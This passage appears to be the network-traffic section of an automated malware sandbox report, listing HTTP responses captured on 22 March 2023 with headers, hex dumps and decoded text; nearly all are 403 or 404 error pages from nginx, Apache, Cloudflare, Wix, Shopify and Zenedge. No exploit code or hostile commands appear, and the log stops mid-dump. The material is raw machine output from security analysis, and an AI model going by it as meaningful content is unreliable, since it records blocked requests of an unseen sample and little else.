64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: 27e4d66048 stream 0.000000 0200 57daPragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XyK73p7WNysXKXAldbpsq7S%2FLWNfVwvQonXAM0lwpoxdPnuxmseLSmLJ1CcqiPQZ8P218cEeRaI%2Frk6%2F5m0ozUsvZJEBs7OuR%2FO8SJaT96lYMZoqwcKyjctAarroYefO4P0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc5f8997b3722-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-s
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:26 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfUULPX/0mKWXsvRp6aPYGx,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1679460206.5702702787316585X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:26 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RtkzTfBD1TueliQ2Y2Vkwh2j0mKIuQP2QIdfXZa72kcCcZYh3liTyOnd5xS4RnXXainVlMh%2Br1mVTKL57QEmZvOCpDO%2BJanikc%2BoWJUdlqb3EHfgQNOL%2BlBzeiiXfSI5"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc6131f19bb91-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:26 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IZyG2HY8XUqJQdC%2B3wYIwQutIq88yGRKWGT1xMzMXgp2MH2%2Bf8V7IwUKaTNG6KrFL2scXNvYblM%2BxruG9es09aBVw6MbmwQEfKLsV3ODem%2FgVy%2FUQjN7%2Bf7%2Fuk9Prgkr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc6139f94bb91-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:43:26 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:27 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:27 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:27 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Wed, 22 Mar 2023 04:43:32 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Server: ZENEDGEX-Zen-Fury: e09d993faee6ea038e1ad4b38d9339b375b58368Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 32 30 34 37 22 2c 20 31 36 37 39 34 36 30 31 39 34 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2047", 1679460194, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:32 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1faXyCYS5tK9dteUje%2B%2FaCi6x9%2BT08TUM7tSQerdrSNHlsbVxiB9BASYCuCGYqh6FkMMGZfk5AwkIF7dyUHkTkgMQ4rmEocYNyBSfcMXuTspttT4b88udrUnWxwsw8HA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc639c934bbc8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:32 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TqxEQpyrtB4iUU7zeOUeot57U%2BNYuMgGIqknTRJk7HRXuTg7ASF5XX1AnIvdz6i%2FWfmvQmfroJLq0H7SYf0vB3VCu7io%2F52eOZqntdwVFMrh%2Bq8wU7uElnAwZ5%2FM7y24"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc63a6993bbc8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:43:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: cd270864-3d5a-41c9-b008-6a2c3e6efb18CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eSxM2t%2B8d7h55iNHayl%2FlfM%2BG8HNHr64PGea%2BXgt8rwdgyml534g4zkSiN4iv1g%2F1agIBHYnyqhw8en6WyUAn6ppqEQaGHFA6NbHaBMYGvYC3ZdUWfqnlGadF4acH90%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=133.000135Server: cloudflareCF-RAY: 7abbc63a384803a0-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:39 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdR+KIVPfgRMI8Uu3xBu5ub,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1679460219.109272338361223579X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 